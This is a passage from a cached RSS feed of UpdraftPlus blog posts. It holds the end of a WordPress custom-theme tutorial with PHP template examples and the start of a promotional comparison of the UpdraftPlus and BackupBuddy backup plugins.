aria-level=\"1\"><span style=\"font-weight: 400;\">Define functions used throughout the application.</span></li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Etc.</span></li>\n</ul>\n<p><span style=\"font-weight: 400;\">The user can add their styles and scripts from </span><i><span style=\"font-weight: 400;\">functions.php</span></i><span style=\"font-weight: 400;\"> file as follows. Please see the following link for more </span><a href=\"https://developer.wordpress.org/themes/basics/including-css-javascript\"><span style=\"font-weight: 400;\">documentation</span></a><span style=\"font-weight: 400;\">.</span></p>\n<pre style=\"background: #efefef;\"><code>function include_js_css() {\nwp_register_style( “bootstrap”, get_stylesheet_directory_uri() .\n“/styles/bootstrap.min.css”, array(), false, “all” );\nwp_enqueue_style( “bootstrap” );\nwp_register_script(‘bootstrap’, get_stylesheet_directory_uri() .\n‘/scripts/bootstrap.min.js’, array(), false, true);\nwp_enqueue_script(‘bootstrap’);\n}\nadd_action(‘wp_enqueue_scripts’, ‘include_js_css’);\n</code></pre>\n<p><span style=\"font-weight: 400;\">The </span><i><span style=\"font-weight: 400;\">get_stylesheet_directory_uri() </span></i><span style=\"font-weight: 400;\">function gives a relative path of the active theme directory. The rest of the code can be seen to be the path of the assets.</span></p>\n<p><span style=\"font-weight: 400;\">Similarly, for adding Navigation Menus, Post Thumbnails:</span></p>\n<pre style=\"background: #efefef;\"><code>function updraft_theme_setup() \n{ add_theme_support( \'post-thumbnails\' ); \nregister_nav_menus( \narray( \'primary\' =&gt; __( \'Primary Menu\' ), \n\'footer1=\'  =&gt; __( \'Footer Menu\' ), \n\'shop\'  =&gt; __( \'Shop Page Menu\' ), \n) \n); \n} add_action( \'after_setup_theme\', \'updraft_theme_setup\' ); \n</code></pre>\n<p><span style=\"font-weight: 400;\">Next, go to the WordPress dashboard and add a post or page. You should see the ‘Featured Image’ section. Additionally, under the </span><b>Appearance &gt;&gt; Menus, </b><span style=\"font-weight: 400;\">you will find the Primary Menu and Footer Menu under </span><b>Manage Locations</b><span style=\"font-weight: 400;\">.</span></p>\n<p><span style=\"font-weight: 400;\">These are just a few of the basic features you can cover while using the ‘Function’ file. There are a lot more you can add in this file if you so wished.</span></p>\n<h4><b>Template files</b></h4>\n<p><span style=\"font-weight: 400;\">When building your theme, template files can be used to affect the layout and design of different parts of your website. For example, you would use the header.php template to create a header, or the comments.php template to include comments on your site. Template files have a </span><i><span style=\"font-weight: 400;\">.php</span></i><span style=\"font-weight: 400;\"> extension. As they are PHP files, all pages output as HTML.</span></p>\n<p><span style=\"font-weight: 400;\">Using templates, developers can distribute code among multiple files. Listed below are some of the files in question.</span></p>\n<ul>\n<li><i><span style=\"font-weight: 400;\">index.php </span></i><span style=\"font-weight: 400;\">: The main template. This file should be responsible for post listing. When you set the Posts page from </span><b>Settings &gt;&gt; Readings</b><span style=\"font-weight: 400;\">, this template gets executed.</span></li>\n<li><i><span style=\"font-weight: 400;\">page.php </span></i><span style=\"font-weight: 400;\">: This template is responsible for rendering your pages. This setting can be overridden by assigning a custom page template to individual pages.</span></li>\n<li><i><span style=\"font-weight: 400;\">single.php</span></i><span style=\"font-weight: 400;\"> : Used when a single post is queried.</span></li>\n<li><i><span style=\"font-weight: 400;\">header.php</span></i><span style=\"font-weight: 400;\"> : Add your header part in this template.</span></li>\n<li><i><span style=\"font-weight: 400;\">footer.php</span></i><span style=\"font-weight: 400;\"> : Add your footer part in this template.</span></li>\n<li><i><span style=\"font-weight: 400;\">sidebar.php</span></i><span style=\"font-weight: 400;\"> : Add widgets in this template.</span></li>\n</ul>\n<p><span style=\"font-weight: 400;\">Get a list of all template files available </span><a href=\"https://codex.wordpress.org/Theme_Development#Template_Files\"><span style=\"font-weight: 400;\">here</span></a><span style=\"font-weight: 400;\">.</span></p>\n<h4><b>Custom page templates</b></h4>\n<p><span style=\"font-weight: 400;\">By default, all your pages are rendered through the </span><i><span style=\"font-weight: 400;\">page.php </span></i><span style=\"font-weight: 400;\">template. But in practice, you sometimes have to display separate flows on different pages. In this scenario, it is recommended that you use the power of custom page templates.</span></p>\n<p><span style=\"font-weight: 400;\">For example, if you have a ‘Career’ page and you want to add your code to this page; to achieve this you would need to create a </span><i><span style=\"font-weight: 400;\">career.php </span></i><span style=\"font-weight: 400;\">file into the theme directory and place the comment below at the top of the file.</span></p>\n<pre style=\"background: #efefef;\"><code>&lt;?php \n/* \nTemplate Name: Career \n*/ \n</code></pre>\n<p><span style=\"font-weight: 400;\">Next, go to the page edit section and assign this ‘Career’ template from under the </span><b>Page Attributes</b><span style=\"font-weight: 400;\"> box.</span></p>\n<p><span style=\"font-weight: 400;\">Now when you visit the Career page &#8211; code from the </span><i><span style=\"font-weight: 400;\">career.php </span></i><span style=\"font-weight: 400;\">will be executed.</span><code><br />\n</code></p>\n<h4><b>Header file</b></h4>\n<p><span style=\"font-weight: 400;\">Your website will have a common header on all pages. You can place this common header into the </span><i><span style=\"font-weight: 400;\">header.php</span></i><span style=\"font-weight: 400;\">. The header code will be something like this:</span></p>\n<pre style=\"background: #efefef;\"><code>&lt;!DOCTYPE html&gt;\n&lt;html &lt;?php language_attributes(); ?&gt;&gt;\n&lt;head&gt;\n&lt;meta charset=\"&lt;?php bloginfo(\'charset\'); ?&gt;\"&gt;\n&lt;meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\" /&gt;\n&lt;?php wp_head(); ?&gt;\n&lt;/head&gt;\n&lt;body &lt;?php body_class(); ?&gt;&gt;\n&lt;?php wp_body_open(); ?&gt;\n&lt;!-- your menu --&gt;</code></pre>\n<p><span style=\"font-weight: 400;\">In the above code, you will notice that we used some functions available in WordPress.</span></p>\n<ul>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><a href=\"https://developer.wordpress.org/reference/functions/wp_head\"><span style=\"font-weight: 400;\">wp_head()</span></a><span style=\"font-weight: 400;\"> : This method inserts crucial elements into your document &#8211; e.g., scripts, styles and meta tags.</span></li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><a href=\"https://developer.wordpress.org/reference/functions/body_class\"><span style=\"font-weight: 400;\">body_class()</span></a><span style=\"font-weight: 400;\"> : This will add different classes to the body element.</span></li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><a href=\"https://developer.wordpress.org/reference/functions/wp_body_open\"><span style=\"font-weight: 400;\">wp_body_open()</span></a><span style=\"font-weight: 400;\"> : Used to insert code immediately after opening the body tag. An example of this would be the- Google Analytics script.</span></li>\n</ul>\n<p><span style=\"font-weight: 400;\">Menus can be added dynamically through the </span><a href=\"https://developer.wordpress.org/reference/functions/wp_nav_menu\"><span style=\"font-weight: 400;\">wp_nav_menu()</span></a><span style=\"font-weight: 400;\"> function. Assuming you have first already created a menu under </span><b>Appearance &gt;&gt; Menus</b><span style=\"font-weight: 400;\"> and assigned ‘primary’ location to it. The code below generates the menu elements dynamically.</span></p>\n<pre style=\"background: #efefef;\"><code>&lt;?php\nwp_nav_menu(\narray(\n\'theme_location\' =&gt; \'primary\',\n\'container_class\' =&gt; \'menus\',\n)\n);\n?&gt;\n</code></pre>\n<p><span style=\"font-weight: 400;\">Once your header file is set, use the </span><i><span style=\"font-weight: 400;\">get_header()</span></i><span style=\"font-weight: 400;\"> function to include this file into your other templates.</span></p>\n<h4><b>Footer file</b></h4>\n<p><span style=\"font-weight: 400;\">Similar to the header file, your common code for the footer will go inside the </span><i><span style=\"font-weight: 400;\">footer.php</span></i><span style=\"font-weight: 400;\"> template.</span></p>\n<pre style=\"background: #efefef;\"><code>&lt;!-- footer elements --&gt;\n&lt;?php wp_footer(); ?&gt;\n&lt;/body&gt;\n&lt;/html&gt;\n</code></pre>\n<p><span style=\"font-weight: 400;\">Here, use the </span><a href=\"https://developer.wordpress.org/reference/functions/wp_footer\"><span style=\"font-weight: 400;\">wp_footer()</span></a><span style=\"font-weight: 400;\"> that inserts elements, specifically scripts, at this location. Using </span><i><span style=\"font-weight: 400;\">get_footer() </span></i><span style=\"font-weight: 400;\">will include the contents of this file in other places.</span></p>\n<h4><b>Sidebar file</b></h4>\n<p><span style=\"font-weight: 400;\">The sidebar is a vertical column used to display information on your site that is not shown within the main content. It may include popular articles, advertisement banners, a newsletter submission form, etc. Sidebars contain widgets that an administrator can customize. The </span><i><span style=\"font-weight: 400;\">sidebar.php </span></i><span style=\"font-weight: 400;\">template will include your site widgets.</span></p>\n<p><span style=\"font-weight: 400;\">In this example, we will create a basic sidebar by adding the below code to the </span><i><span style=\"font-weight: 400;\">functions.php</span></i><span style=\"font-weight: 400;\"> file.</span></p>\n<pre style=\"background: #efefef;\"><code>function updraft_widgets_init() {\nregister_sidebar(\narray(\n\'name\' =&gt; esc_html__( Home Sidebar\' ),\n\'id\' =&gt; \'sidebar-1\',\n\'description\' =&gt; esc_html__( \'Add widgets here to appear in your sidebar.\' ),\n\'before_widget\' =&gt; \'&lt;section id=\"widget\" class=\"widget\"&gt;\',\n\'after_widget\' =&gt; \'&lt;/section&gt;\',\n\'before_title\' =&gt; \'&lt;h2 class=\"widget-title\"&gt;\',\n\'after_title\' =&gt; \'&lt;/h2&gt;\',\n)\n);\n}\nadd_action( \'widgets_init\', \'updraft_widgets_init\' );\n</code></pre>\n<p><span style=\"font-weight: 400;\">Next, go to the </span><b>Appearance &gt;&gt; Widgets</b><span style=\"font-weight: 400;\">. Here you will find the above sidebar. In this example, we are going to add some widgets to this sidebar. To add this sidebar to the frontend, add the following code in </span><i><span style=\"font-weight: 400;\">sidebar.php.</span></i></p>\n<pre style=\"background: #efefef;\"><code>&lt;div class=\"sidebar\"&gt;\n&lt;?php\nif ( is_active_sidebar( \'sidebar-1\' ) ) {\ndynamic_sidebar( \'sidebar-1\' );\n}\n?&gt;\n&lt;/div&gt;\n</code></pre>\n<p><span style=\"font-weight: 400;\">Finally, remember to name the method ‘</span><i><span style=\"font-weight: 400;\">get_sidebar()’ </span></i><span style=\"font-weight: 400;\">so you can easily include the sidebar wherever on any other pages as and when needed.</span></p>\n<p><b>Rendering pages and posts</b></p>\n<p><span style=\"font-weight: 400;\">As already mentioned, all WordPress pages are rendered and executed using the code you have written in the </span><i><span style=\"font-weight: 400;\">page.php </span></i><span style=\"font-weight: 400;\">file, except pages with custom page template. The below code is an example that will show a <em><strong>page featuring the page title, description and featured image.</strong></em></span></p>\n<pre style=\"background: #efefef;\"><code>&lt;?php\nget_header();\n?&gt;\n&lt;div id=\"primary\" class=\"content-area\"&gt;\n&lt;main id=\"main\" class=\"site-main\"&gt;\n&lt;?php\nwhile ( have_posts() ) :\nthe_post();\n?&gt;\n&lt;?php\nif ( has_post_thumbnail() ) :\nthe_post_thumbnail();\nendif;\n?&gt;\n&lt;header class=\"entry-header\"&gt;\n&lt;?php the_title(); ?&gt;\n&lt;/header&gt;\n&lt;div class=\"entry-content\"&gt;\n&lt;?php the_content(); ?&gt;\n&lt;/div&gt;\n&lt;?php\nendwhile;\n?&gt;\n&lt;/main&gt;\n&lt;/div&gt;\n&lt;?php\nget_footer();\n</code></pre>\n<p><span style=\"font-weight: 400;\">Similar code will go inside the </span><i><span style=\"font-weight: 400;\">single.php </span></i><span style=\"font-weight: 400;\">file to display the post information. To render the post listing properly (your </span><i><span style=\"font-weight: 400;\">index.php</span></i><span style=\"font-weight: 400;\">), in addition to the above methods &#8211; you may also want to use the following:</span></p>\n<ul>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">the_catgeory() : Displays category list for a post.</span></li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">the_permalink() : Displays the permalink for the current post.</span></li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">the_excerpt() : Display the post excerpt.</span></li>\n</ul>\n<h4><b>I18n for WordPress custom themes</b></h4>\n<p><span style=\"font-weight: 400;\">While building a custom theme, try to remember that it should be developed in a way to support internationalization. By doing this, it makes it possible for your theme to easily be translated into other languages.</span></p>\n<p><span style=\"font-weight: 400;\">To add I18n support, remember to use a text domain which you can parse source files and extract the translatable strings from. In this example, we are using the text domain ‘Updraft’, but you can choose any unique identifier. We can define the text domain as follows. </span></p>\n<pre style=\"background: #efefef;\"><code>function i18n_setup() {\nload_theme_textdomain( \'updraft\', get_stylesheet_directory() . \'/languages\' );\n}\nadd_action( \'after_setup_theme\', \'i18n_setup\' );\n</code></pre>\n<p><span style=\"font-weight: 400;\">Now whenever you use static strings in your theme files, wrap them inside </span><i><span style=\"font-weight: 400;\">__()</span></i><span style=\"font-weight: 400;\"> or </span><i><span style=\"font-weight: 400;\">_e()</span></i><span style=\"font-weight: 400;\"> functions.</span></p>\n<pre style=\"background: #efefef;\"><code>&lt;h2&gt;&lt;?php _e(\'First Name\', \'updraft); ?&gt;&lt;/h2&gt;\n&lt;?php echo __(\'User Email\', \'updraft\'); ?&gt;\n</code></pre>\n<p><span style=\"font-weight: 400;\">There are special tools available like POEDIT that help to generate translated language files. Please refer to </span><a href=\"https://updraftplus.com/how-to-localize-and-translate-a-wordpress-plugin-an-in-depth-guide-for-plugin-developers\"><span style=\"font-weight: 400;\">this blog</span></a><span style=\"font-weight: 400;\"> for more information.</span></p>\n<p><span style=\"font-weight: 400;\">This blog has covered the basics on creating WordPress custom themes. However, it is a vast topic that requires a lot of time and patience. Below are some helpful resources you should get acquainted with that will help you start to create your WordPress themes..</span></p>\n<ul>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><a href=\"https://codex.wordpress.org/The_Loop_in_Action\"><span style=\"font-weight: 400;\">The WordPress Loop</span></a></li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><a href=\"https://codex.wordpress.org/Template_Tags\"><span style=\"font-weight: 400;\">Template Tags</span></a></li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><a href=\"https://codex.wordpress.org/Category_Templates\"><span style=\"font-weight: 400;\">Category Pages</span></a></li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><a href=\"https://codex.wordpress.org/Function_Reference\"><span style=\"font-weight: 400;\">Function_Reference</span></a></li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><a href=\"https://codex.wordpress.org/Conditional_Tags\"><span style=\"font-weight: 400;\">Conditional Tag</span></a></li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><a href=\"https://make.wordpress.org/core/handbook/best-practices/coding-standards\"><span style=\"font-weight: 400;\">WordPress Coding Standards</span></a></li>\n</ul>\n<p>When create a new theme for your WordPress site, remember that you will need to back it up after every change or risk losing all your work. Use <a href=\"http://updraftplus.com\">UpdraftPlus</a> &#8211; The world&#8217;s leading and most trusted WordPress backup, restore and clone plugin.</p>\n<p>The post <a rel=\"nofollow\" href=\"https://updraftplus.com/how-to-create-a-wordpress-custom-theme/\">How to create a WordPress custom theme</a> appeared first on <a rel=\"nofollow\" href=\"https://updraftplus.com\">UpdraftPlus</a>. <a href=\"http://updraftplus.com\">UpdraftPlus - Backup, restore and migration plugin for WordPress.</a></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:68:\"https://updraftplus.com/how-to-create-a-wordpress-custom-theme/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"0\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:42:\"http://rssnamespace.org/feedburner/ext/1.0\";a:1:{s:8:\"origLink\";a:1:{i:0;a:5:{s:4:\"data\";s:63:\"https://updraftplus.com/how-to-create-a-wordpress-custom-theme/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:6;a:6:{s:4:\"data\";s:81:\"\n		\n		\n		\n		\n		\n				\n		\n		\n		\n		\n		\n		\n		\n		\n		\n\n					\n										\n					\n		\n		\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:61:\"UpdraftPlus Vs BackupBuddy: WordPress backup plugins compared\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:58:\"http://feedproxy.google.com/~r/UpdraftPlus/~3/3043WdYoZ4A/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 23 Jul 2021 14:48:17 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:9:{i:0;a:5:{s:4:\"data\";s:20:\"Other WordPress news\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:6:\"Backup\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:11:\"backupbuddy\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:3;a:5:{s:4:\"data\";s:6:\"better\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:4;a:5:{s:4:\"data\";s:10:\"comparison\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:5;a:5:{s:4:\"data\";s:6:\"plugin\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:6;a:5:{s:4:\"data\";s:7:\"updraft\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:7;a:5:{s:4:\"data\";s:11:\"UpdraftPlus\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:8;a:5:{s:4:\"data\";s:9:\"wordpress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"https://updraftplus.com/?p=1184117\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:356:\"<p>The post <a rel=\"nofollow\" href=\"https://updraftplus.com/udpvsbup-wordpress-backup-comparison/\">UpdraftPlus Vs BackupBuddy: WordPress backup plugins compared</a> appeared first on <a rel=\"nofollow\" href=\"https://updraftplus.com\">UpdraftPlus</a>. <a href=\"http://updraftplus.com\">UpdraftPlus - Backup, restore and migration plugin for WordPress.</a></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Wayne Mullins\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:14399:\"<div class=\"et_pb_section et_pb_section_0 et_section_regular\" >\n				\n				\n				\n				\n					<div class=\"et_pb_row et_pb_row_0\">\n				<div class=\"et_pb_column et_pb_column_4_4 et_pb_column_0  et_pb_css_mix_blend_mode_passthrough et-last-child\">\n				\n				\n				<div class=\"et_pb_module et_pb_text et_pb_text_0  et_pb_text_align_left et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_text_inner\"><p><iframe loading=\"lazy\" title=\"UpdraftPlus vs BackupBuddy. Which is the best WordPress backup plugin?\" width=\"1080\" height=\"608\" src=\"https://www.youtube.com/embed/AgSgtTsZPd8?feature=oembed\"  allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen></iframe></p>\n<p><b>BackupBuddy Vs UpdraftPlus – Which Is Better?</b></p>\n<p><span style=\"font-weight: 400;\">One of the biggest risks you face when setting up your own WordPress website is when your site inevitably encounters a problem such as hacks, plugin issues, a bad update, malware or compatibility problems. After all the time and money you spent building and launching your site, it’s possible that you could lose everything in a blink of an eye. </span><span style=\"font-weight: 400;\">It’s all too easy not to even think of these problems, until it actually happens. This is why having a WordPress backup plugin is so important. With the right backup plugin, you can restore your website to it’s working state with a click of a button. </span><span style=\"font-weight: 400;\">In a crowded marketplace with so many options, it can sometimes be difficult to evaluate which plugin is the best for you. In this blog and video we will look at and review two of the most popular backup plugins &#8211; <a href=\"http://updraftplus.com\">UpdraftPlus</a> and <a href=\"https://ithemes.com/backupbuddy/?irgwc=1&amp;irpid=56411&amp;gclid=Cj0KCQjw0emHBhC1ARIsAL1QGNfQ09dHqkgVfJuD8Sd11rwV6Vb2o31WOwYB0uErI8lDgvW6v3b8HSoaAkKLEALw_wcB\">BackupBuddy</a> &#8211; evaluate the strengths and weaknesses of both, and assess the benefits of Premium versions.</span></p>\n<p><b>Free plugin versions</b></p>\n<p><span style=\"font-weight: 400;\">The <a href=\"https://wordpress.org/plugins/updraftplus/\">free version</a> of the UpdraftPlus plugin is used on over 3 million WordPress sites all over the world and is the highest rated backup plugin on WP.org. The free version can quickly backup and restore your site and comes with enough features and tools to satisfy most users. This plugin can also easily be downloaded directly in your WordPress site plugin settings, allowing you to start backing up straight away.</span></p>\n<p><a href=\"https://updraftplus.com/wp-content/uploads/2021/07/New-Project-2021-07-23T151948.350.jpg\"><img loading=\"lazy\" class=\"alignnone wp-image-1184165\" src=\"https://updraftplus.com/wp-content/uploads/2021/07/New-Project-2021-07-23T151948.350.jpg\" alt=\"\" width=\"910\" height=\"512\" /></a></p>\n<p><span style=\"font-weight: 400;\">BackUpBuddy does not currently offer a free version of it’s backup plugin. As such, it is not possible to compare the free versions of both plugins at this time.</span></p>\n<p><b>What to look for in a backup plugin</b></p>\n<p><span style=\"font-weight: 400;\">When deciding which backup plugin is best to backup your WordPress site, there are several criteria you should look at, including options that will allow you to backup all your files, database, plugins, themes, uploads and any other directories found, as well as most importantly allowing you to easily restore your site should the worst happen. </span></p>\n<p><span style=\"font-weight: 400;\">When backing up your site, it is important to choose the right remote storage location. With UpdraftPlus Premium, you have 10 well known remote storage options such as Amazon S3, Google Cloud and Dropbox, as well as 6 additional </span><span style=\"font-weight: 400;\">backup location options including email and FTP.</span></p>\n<p><a href=\"https://updraftplus.com/wp-content/uploads/2021/07/New-Project-2021-07-23T152118.395.jpg\"><img loading=\"lazy\" class=\"alignnone wp-image-1184166\" src=\"https://updraftplus.com/wp-content/uploads/2021/07/New-Project-2021-07-23T152118.395.jpg\" alt=\"\" width=\"898\" height=\"358\" srcset=\"https://updraftplus.com/wp-content/uploads/2021/07/New-Project-2021-07-23T152118.395.jpg 898w, https://updraftplus.com/wp-content/uploads/2021/07/New-Project-2021-07-23T152118.395-480x191.jpg 480w\" sizes=\"(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) 898px, 100vw\" /></a></p>\n<p><span style=\"font-weight: 400;\">BackupBuddy’s options are limited to 5 of the well known remote storage options, with 3 additional backup locations. </span></p>\n<p><b>Tutorial guides</b></p>\n<p><span style=\"font-weight: 400;\">The plugin itself isn’t the only factor you should consider when making your decision. Setting up and using all the different features in these plugins can sometimes be tricky and confusing, especially for those who may not be IT experts. UpdraftPlus has dozens of up to date video guides on <a href=\"https://www.youtube.com/c/Updraftplus/videos\">YouTube</a> that can show you everything from how to update from the free version, to the Premium version, to how to connect your UpdraftPlus account to the remote storage provider of your choice.</span></p>\n<p><a href=\"https://updraftplus.com/wp-content/uploads/2021/07/New-Project-2021-07-23T152540.468.jpg\"><img loading=\"lazy\" class=\"alignnone size-full wp-image-1184174\" src=\"https://updraftplus.com/wp-content/uploads/2021/07/New-Project-2021-07-23T152540.468.jpg\" alt=\"\" width=\"872\" height=\"646\" srcset=\"https://updraftplus.com/wp-content/uploads/2021/07/New-Project-2021-07-23T152540.468.jpg 872w, https://updraftplus.com/wp-content/uploads/2021/07/New-Project-2021-07-23T152540.468-480x356.jpg 480w\" sizes=\"(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) 872px, 100vw\" /></a></p>\n<p><span style=\"font-weight: 400;\">BackupBuddy’s list of video guides is somewhat limited in comparison, with minimal instructions and only a few (if any) guides on how to connect BackupBuddy to a remote storage location.</span></p>\n<p><a href=\"https://updraftplus.com/wp-content/uploads/2021/07/New-Project-2021-07-23T152332.937.jpg\"><img loading=\"lazy\" class=\"alignnone wp-image-1184169\" src=\"https://updraftplus.com/wp-content/uploads/2021/07/New-Project-2021-07-23T152332.937.jpg\" alt=\"\" width=\"866\" height=\"548\" /></a></p>\n<p><b>Scheduling</b></p>\n<p><span style=\"font-weight: 400;\">Making regular scheduled backups of your WordPress site is essential, as you always want to have the latest version on your site on hand should the worst happen. Both plugins offer scheduling backup options ranging from automatically backing up every hour or so, to every year. With UpdraftPlus however, you can select how many copies of your backup you want to keep within the same page on your site. </span></p>\n<p><a href=\"https://updraftplus.com/wp-content/uploads/2021/07/New-Project-2021-07-23T152803.789.jpg\"><img loading=\"lazy\" class=\"alignnone wp-image-1184176\" src=\"https://updraftplus.com/wp-content/uploads/2021/07/New-Project-2021-07-23T152803.789.jpg\" alt=\"\" width=\"868\" height=\"233\" /></a></p>\n<p><span style=\"font-weight: 400;\">While this option is also available in BackupBuddy, it is hidden away in a sub-menu &#8211; making it difficult to find.</span></p>\n<p><b>UpdraftPlus or BackupBuddy?</b></p>\n<p><span style=\"font-weight: 400;\">So which backup plugin should you choose? <a href=\"http://updraftplus.com\">UpdraftPlus</a> is the world’s most trusted and popular plugin that is trusted by over 3 million users worldwide. With this level of trust, support and development, as well as the ability to backup and restore your site quickly and easily, UpdraftPlus gives you everything you need to backup and restore your site with just a press of a button. </span></p>\n<p>&nbsp;</p></div>\n			</div> <!-- .et_pb_text --><div id=\"tablecomparison\" class=\"et_pb_module et_pb_code et_pb_code_0 tablecomparison\">\n				\n				\n				<div class=\"et_pb_code_inner\"><table id=\"comparison-table\">\n<thead><tr><th bgcolor:\"#f4f4f4\";></th><th><h3>UpdraftPlus Premium</h3></th><th><h3>BackWPup</h3></th><th><h3>BackupWordPress</h3></th><th><h3>VaultPress</h3></th><th><h3>WP-DB-Backup</h3></th><th><h3>BackUp Buddy</h3></th></tr>\n</thead>\n<tbody>\n <tr><td style=\"text-align:left;\"><h4>Rating</h3></td><td style=\"color:green;\">98%</td><td>78%</td><td>94%</td><td>94%</td><td>92%</td><td>N/A</td></tr><tr><td style=\"text-align:left;\"><h4>Downloads</h4></td> <td style=\"color:green;\">58.57M</td><td >11.50M</td><td >4.42M</td><td >1.46M</td><td >1.48M</td> <td>N/A</td></tr><tr><td style=\"text-align:left;\"><h4>Update Rating</h4></td><td style=\"color:green;\">100%</td><td style=\"color:green;\">100%</td><td style=\"color:green;\">100%</td><td>97%</td><td>83.26%</td><td>N/A</td></tr><tr><td style=\"text-align:left;\"><h4>Active Installs</h4></td> <td style=\"color:green;\">3.00M</td><td >700K</td><td >200K</td><td >50,000</td><td >60,000</td> <td>N/A</td></tr><tr><td style=\"text-align:left;\"><h4>Automatic restore</h4></td><td style=\"color:green;\"><b>✓</b></td><td style=\"color:red;\">✘</td><td style=\"color:red;\">✘</td><td style=\"color:green;\"><b>✓</b></td><td style=\"color:red;\">✘</td><td style=\"color:red;\"><b>✘</b></td></tr><tr><td style=\"text-align:left;\"><h4>Migration clone ability</h4></td><td style=\"color:green;\"><b>✓</b></td><td style=\"color:red;\">✘</td><td style=\"color:red;\">✘</td><td style=\"color:green;\"><b>✓</b></td><td style=\"color:red;\">✘</td><td style=\"color:green;\"><b>✓</b></td></tr><tr><td style=\"text-align:left;\"><h4>Direct site-to-site migration or cloning</h4></td><td style=\"color:green;\"><b>✓</b></td><td style=\"color:red;\">✘</td><td style=\"color:red;\">✘</td><td style=\"color:red;\">✘</td><td style=\"color:red;\">✘</td><td style=\"color:red;\">✓</td></tr><tr><td 